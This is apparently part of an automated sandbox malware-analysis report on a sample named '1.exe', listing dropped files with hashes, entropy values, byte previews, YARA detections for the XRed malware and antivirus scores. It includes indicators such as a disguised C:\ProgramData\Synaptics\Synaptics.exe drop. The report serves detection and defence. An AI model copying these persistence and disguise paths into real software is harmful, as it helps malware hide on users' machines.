                                                                                                                    SHA-512:06E4B731019575D04080D7BC5D6D038C6A1A12A88EEF91960C64CBC833D01ED53D920197F2CE9956AF6DF52EE51D7486C86C5095AAA78B37DEB348A444E06470
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:MDMP..a..... .........}g............t.......................$...0>.......<.............`.......8...........T...........h...(...........T>..........@@..............................................................................eJ.......@......GenuineIntel............T.............}g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERF861.tmp.WERInternalMetadata.xml

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):6302
                                                                                                                    Entropy (8bit):3.7145337268819967
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:R6l7wVeJ5xy6CYiSW5XpDA89bPcjsfStam:R6lXJa6CYu5PkIfY
                                                                                                                    MD5:DCD3C9442CD7122AB5355DF492894E18
                                                                                                                    SHA1:D1CB7CAAE2DDEAF496FD08A5FC6062F0946B64A1
                                                                                                                    SHA-256:A11E5E29290736FBF36FEE9901F45AFA866F20E1726B1BA4043B28EE38040218
                                                                                                                    SHA-512:23491B191B186A3E360277A3B0F4BC16CDD23FEA5AF0B5A7D8B1B0205FA7E9468F5146B148D0BB4D0EBFCDE695E8AA19A952369529028412F0AED6BE7FE4655B
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.6.0.<./.P.i.

                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERF881.tmp.xml

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4572
                                                                                                                    Entropy (8bit):4.442504612095313
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:cvIwWl8zsPQJg77aI9k3WpW8VYFYm8M4JFetFOE+q84ihUlsZ9d:uIjfPWI7aG7VhJPEMUlsZ9d
                                                                                                                    MD5:6C1B52DF00F1600A731E245E705D611B
                                                                                                                    SHA1:E0E9A3999E6127783331DAC4E8654828A831F266
                                                                                                                    SHA-256:13AA1276889A55CA8D966C16661CE806A2CD0B957EC02DBE19B9918F3FED51D0
                                                                                                                    SHA-512:D4328B0B98693ED818A11148DC9B4D1528BDDC56A927B1139E648CA93A40B82FB6AF5BF0EB1DBBFBF347FF6A539D857F7BA97628F331570B206290F18B9226D0
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="665481" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                    C:\ProgramData\Synaptics\RCX9CB3.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\1.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:modified
                                                                                                                    Size (bytes):772096
                                                                                                                    Entropy (8bit):6.636956363807124
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9F6+:ansJ39LyjbJkQFMhmC+6GD9B
                                                                                                                    MD5:065BECDE24188ED65E53BECB09A5A039
                                                                                                                    SHA1:1B93E985BC3000BAC77112697F6702B2EB52CC37
                                                                                                                    SHA-256:641147AE6E518E7930EFE2A90B61DD0A22F23BBA6D77F7FAE48380A6F7842E6C
                                                                                                                    SHA-512:879D047CF07153B113D39A20BFDEC4B3429D5B431641D026AE38FBBD198C40BD28179CC03B9A208C3214B4E604E568E5813B20E720F150E9A06EE7C54D667A08
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX9CB3.tmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX9CB3.tmp, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................(....................@.......................... ...................@..............................B*......`....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...`........ ..................@..P....................................@..P........................................................................................................................................

                                                                                                                    C:\ProgramData\Synaptics\Synaptics.exe

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\1.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1101824
                                                                                                                    Entropy (8bit):6.7652852257842975
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24576:FnsJ39LyjbJkQFMhmC+6GD9nkKh5OYceEMQ+h0W:FnsHyjtk2MYC5GDT58M7hH
                                                                                                                    MD5:D0598443FA9984227105811E5D89B70F
                                                                                                                    SHA1:3932D4696F4130658FBF2A16E7F771FC756A63CC
                                                                                                                    SHA-256:FC1595C71B570027B6712C70CAFCC075686E14B5702A5A0910F642EB739AC01F
                                                                                                                    SHA-512:142EBD6E1BF24D82533355E76BB9433DEEFDD4EE918BA04CC12419CC17CB564F86AF386BF949617E386BFFA1E0036EC5DB912BC8B985A1DE94330B3B14E3FD29
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................0....................@..........................0...................@..............................B*.......'...................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc....'.......(..................@..P....................................@..P........................................................................................................................................

                                                                                                                    C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\1.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):26
                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                    Malicious:true
                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                    C:\Users\user\AppData\Local\Temp\19iSTCE.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.269673333085929
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0JSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+C+pAZewRDK4mW
                                                                                                                    MD5:FE2DC39B57A684C3BE12F81E9BB5C598
                                                                                                                    SHA1:EE4D488252D35907BC5B92BE9D8ED3233127B07E
                                                                                                                    SHA-256:03D716C13F3A18F32987D02BD096CD55F3A89B5A732A8893B1D5D91D16B02675
                                                                                                                    SHA-512:9958C4E3BF47CF36E20DAF2256CF5E988D44DF3C1DBB279BC108B95B870897CA986A7B70017A46E24E4FF9383A9429C18789B468FE29956BE481989DC3911042
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="O_DWKuNVL--_ESc8oP3Uuw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\2d7hiZE.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.25997657714486
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0yR6SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c+pAZewRDK4mW
                                                                                                                    MD5:2CFEE4A7A22D87B7F93BA3088DD2CEF7
                                                                                                                    SHA1:DC036BC940E99C461F8ED8B3DA1CA742773A64A0
                                                                                                                    SHA-256:ED5E71887481B8FFC9796A5C0205D4FCB4324277F484570683F5735212E6AD5B
                                                                                                                    SHA-512:CB0E738BE07CC3ABC306C28AD143BF077DD136F1B6BA86267DA88AECFB0CFE8607621C51C90B97030D0BF7EA8805E6C737FDDF5164D3BE913D4EE100E623BB9B
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HFXgLckLA9xjEi1Pk4rdnA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\3NfEdQO.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.257417802448201
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0BSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+e+pAZewRDK4mW
                                                                                                                    MD5:05616047A97587562E81F06BD789BE4B
                                                                                                                    SHA1:0B9ACC06383DAB60643E5DD4F66DFAB8C43E1827
                                                                                                                    SHA-256:F93221E4A9412828B57EE281AD1651EE0A55BBE61DCCE6E434A04874C45E3188
                                                                                                                    SHA-512:838ECB7D58493443F6F7FCC18790E7571226B56DAEDE879D4ED4378FB374B7B982F1674E4816F65AF598EA48BC30B381A3792E17A34D5387EB0AB858F9E6651A
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uoxn5O5Al3vRizO7Wm9MaQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\3tonPrA.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.2539822571349255
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+052SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+g2+pAZewRDK4mW
                                                                                                                    MD5:210DCAC51CAC2B03EF546E86397ACA1C
                                                                                                                    SHA1:F0A26611AC655D5426674815F225B3E9BC8BD71C
                                                                                                                    SHA-256:CAF5722EA5B563AF4F3DEF61C33E5EE486DC53D0F0997461268E039244CF9AF7
                                                                                                                    SHA-512:F94634C67219F7986F26884941C85717A0CF2D1C304FCEC3F3E62B8F82BB561D6C50FC9543A326EC37611002286260A2E4194062D3CAF45A57C3B7EA87F21B09
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7otxik4TQ8eCCtzUsy4iPA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\IoqRZiB.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.258755459992018
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0HSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+o+pAZewRDK4mW
                                                                                                                    MD5:CE2D5D2907126FD4EC6F80EF0B4B74EB
                                                                                                                    SHA1:751398C80FF92B2F9BAE2CBF286F0DBCD8BB1BBD
                                                                                                                    SHA-256:E89FF12E7B972AA3F6AF1A57B1C10CD20FF0E74EA329BD5FCE30E4AB1227A25F
                                                                                                                    SHA-512:028D91886C79947ADC824B78C30FE65A199EB38D9503F2B08FCE3561437F44D61CC7F6CEF37097F915B6D8FB94AAEB45FB9610805C8B9194961DAE1DB97607D7
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UjdtW3X5dgkaPwV7kBuH2g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\Qqvorhy.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.258640999418921
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+09iamSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+4M+pAZewRDK4mW
                                                                                                                    MD5:BEE5BC6D0D255C51FBF03A61DE57BD26
                                                                                                                    SHA1:951D38E5433BC13568C99ABBEF2797076A099E2A
                                                                                                                    SHA-256:2F21CD0B4188D49EE6FD52880E41D4E6EB0A316BE075B247C79872744F01A176
                                                                                                                    SHA-512:40C9AB2BAA8EBF4FA1136552D2AE7DB07F33605BB76022E092DF5886E75A50BDA1E5FD613642486330D6800888CF13149009C671D73AFCD450D0974E6815E755
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gabtfsLkFNxVQdZzsxKpWA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\U1NTS3we.xlsm

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18387
                                                                                                                    Entropy (8bit):7.523057953697544
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                    MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                    SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                    SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                    SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                    Malicious:false
                                                                                                                    Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                    C:\Users\user\AppData\Local\Temp\WSa6XyJ.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.278627987755061
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+w+pAZewRDK4mW
                                                                                                                    MD5:8213DD2C7D5A5C9662D2938BE703849C
                                                                                                                    SHA1:A1C3795DA43A0164B169EE6238AD9EFDC2929A67
                                                                                                                    SHA-256:4E42F0EE8ED720938F841D29E4C01CF79700CA53FD02C29C8DFF4EEB83B9CB65
                                                                                                                    SHA-512:B2F3C1FCF191102C97711FD10BEEE2A2E710A276C8D2C45CF3C06F4108C24B2086EA8F1E47AA6C22903422D57FB2265184FC08BDDEC172752A4DB739CD56E1C4
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SaXZ3l3EjCsHvHEyLV2jZQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\bhdSJfp.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.264787141711439
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+04SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+j+pAZewRDK4mW
                                                                                                                    MD5:A0EF0A7B90AC7D26B0E14F7D15AE3193
                                                                                                                    SHA1:6F7A3983DE186383585A5485C880232B3C062C5B
                                                                                                                    SHA-256:BD6A506143F23B956F6467362123D30584E947AD56B2E8D7852949109E9DF06A
                                                                                                                    SHA-512:83E83D903A154943CBAE783DDDE50DF1C967E0B93B4DC380CF1DFCCCB4013876E2ABB546F593D6A5B0D871755242A5DC51AE689E78E117E2F73DFA0753F5815E
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="q3ucf8aNp-E5DAsZGtCuKQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\c9Pv9TR.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.2708240056155535
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0vrSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+s+pAZewRDK4mW
                                                                                                                    MD5:BD4373CDB50BA315597B70DCB149044A
                                                                                                                    SHA1:059A0C744FCBB538482FFB5A115249F85364A76B
                                                                                                                    SHA-256:13E1016A0C33BE4ADA41A72484D9FE3F85EED0A1FCFB0ACA4D8D1F1DDD3E057A
                                                                                                                    SHA-512:830B74B54C628A70FFB1E7D0FC49A2689E24084EE323387050F7966C9EC1F8C312994A7EF8E9E5283EE51602512BEA65DF6B31B49A472DDD1ADEDF3F2BA488CD
                                                                                                                    Malicious:false
